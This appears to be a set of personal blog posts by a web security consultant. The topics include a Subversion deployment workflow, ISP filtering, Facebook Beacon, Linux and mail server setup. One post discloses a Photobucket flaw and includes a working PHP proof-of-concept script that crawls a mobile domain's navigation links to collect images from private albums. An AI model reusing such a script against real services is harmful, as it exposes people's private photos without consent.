Yes… That was his pw.
I’m not blogging on this much because all it was is someone guessing his password, which is quite hilarious though.
Anyway.. at the end of the video he posted, he calls out hackers, wanting to make an example of this one.. lets just say it is not wise
to mess with people who can take your life away in this digital age, just tell him to ask the owner of LifeLock how that works out for you.
I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however going to explain how I am implementing Subversion into my current development environment.
First, my reasons for using version control
Here is how it all works.
I have 3 machines , dev/repo/serv , where dev is my development workstation, repo is the machine hosting the subversion repository, and serv is my http server.
On the http server, in my projects directory, there is a folder for each project I am working on. In the individual project folder, there are 3 other folders, dev/staging/live.
Using Virtual Hosts on httpserv, I make the development folder only accesible by my local network, the staging folder is available by password protection, and the live server is publicly available.
I use Zend Studio For Eclipse with a Subversion/PHP Project and use WebDrive to securely map the projects dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of project files) on the dev folder on my http server.
I edit files from my workstation, and view the changes on the development vhost. Once I finish adding a module/functionality/milestone on the project and want the clients’ approval, I use a script called svn_sync.sh located in each projects main directory.
Svn_sync.sh, first makes sure you have committed changes to the trunk aka dev folder, after that you specify what source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch, and update the working copy inside the staging folder. I now can show the client the changes.
Once I have his approval, I run svn_sync.sh again, and have it merge the staging branch into the live branch, and then update the live directory aka The live server.
That is my SDLC (Software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.
This method is everything I could wish for, High Availability, Reliable, Robust, scalable, and professional.
Sure direct editing and copy -r work, and I maybe overdoing it as a single developer, but I am very happy with my results and would recommend anyone wanting the experience to do the same.
It is unarguable that Jeremiah Grossman is a pretty big name in Web Application Security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansens’ posts. They tend to have a lot of great info, and a lot of fun things to be a part of.
Jeremiah has his W.A.S. Survey up for anyone that works around the field to take. Some of the questions are really inquisitive.
Anyway, if you work around the field, you should take the survey. Head on over to his site to take the survey.
Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.
I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend Jessie McKnight. The catch to it, was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links take a lot of time.
I hacked up a working script in about an hour, that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsuled in an image tag to a html file using the original photobucket url (not the mobile domain), then it repeats this process on the url obtained by the prev anchor.
This was a very intensive process so I capped it at 50 requests, and storing the pictures on a seperate page allowed for quicker retrievals while the script was crawling, also for saving results from different people using the script at the same time.
This is in no way an optimized script, this was thrown together from scrap to completion in under an hour, but is just a P.O.C
<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>
<?php
if(isset($_GET['album'])){
$fh = fopen('photos.html','a');
$get_album = $_GET['album'];
$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
$albumurl = substr($get_album,0,strrpos($get_album,'/'));
$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
$i=0;
while($i <= 100){
$url = getPrevUrl($url);
$im = getImage($url,$albumurl);
fwrite($fh,$im);
echo $im;
$i++;
}
fclose($fh);
}
function getPrevUrl($url){
$input = @file_get_contents($url) or die('Could not access file: $url');
$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
if(preg_match_all("/$regexp/siU", $input, $matches)) {
$photoUrl = "http://m55.photobucket.com" . $matches[2][4];
return $photoUrl;
}else{
return $url;
}
}
function getImage($url,$alburl){
$photoUrl = substr($url,0,strrpos($url,"."));
$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
$photoUrl = $alburl . $photoUrl;
return "<img src='$photoUrl'/><br/>";
}
I have not went into detail about this agreement, but you can be certain, whenever ISP’s ban together to prevent something, it hurts the consumer.
Filtering slows down speeds (minutely), but the real flaw in filtering is the use of a non-certain list. Whitelist or Blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.
I am definately against child pornography, however, false positives from filtering, and the way some ISPs like to communicate with law enforcement could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with web hosting companies that are hosting accounts with this type of content on it. Filtering is not mature enough yet.
For instance, AT&T customers, this blog post even, might be filtered away in the given year. Just for it’s title.
Filtering, throttling, anything other than providing direct internet connectivity is a horrible breach of trust and net neutrality, boo!
If you haven’t heard about the beacon in facebook publishing private data, then you have been under a rock. But wait, beacon is now an opt-out service, so this is old news, right?
Wrong!
According to a post on slashdot, beacon still tracks you whether you are logged into facebook or not. I had high hopes for facebook, being an advocate of php and open source technology, but shame, shame on you facebook.
This issue needs more spotlight.
I’ve been dying to have a Linux workstation. I have BackTrack 3 installed in VM on my desktop, but that is not enough. I miss my gentoo installation, and considered it, but it just takes too long and my schedule is more than full.
I cannot change over my desktop OS due to using Media Center for my home pvr, see other posts for details. Also because I game every now and then, and use the CS3 suite, so oh well. Dual booting is not worth it when I can work off a VM.
So my laptop is the choice then, with it’s semi-broken screen and all. I decide to go with Fedora, it’s an easy install, a programmers type of distro, and I am familiar with it from the past. I download Fedora 9 Sulphur for amd64, install was FLAWLESS, just perfect. Boot up, everything works like supposed to.
If I have ever spoken to you regarding mail servers, it was probably a frustrating conversation. Me and mail servers just do not get along. I have tried numerous times on all sorts of platforms from unix to linux and windows to get sendmail, postfix, even iis to work correctly.
Well, as a developer, I am needing mail functionality in my php applications. I also would like my joeyadams.net and other domains to be able to have unique email addresses. I already have a windows 2k3 server set up for file/print and previously mail with exchange, which actually worked… well some of the time.
So here is my plan, on my redhat box, ditch sendmail, use postfix. On win2k3 setup simple iis smtp and pop3 services.
JoeyAdams.net is now home to my blog. I am in the midst of finishing a couple of web applications and getting them marketed, after that I will be working on the startup of a consulting company specializing in Internet Security and Web Development.
Time to time I will post about happenings in the security and web world as well as post articles about security and development related topics.
Check back regulary or syndicate to gain more information.
 
| Joey Adams is a web and security consultant and a developer dedicated to his passion for technology and strive for innovation. |
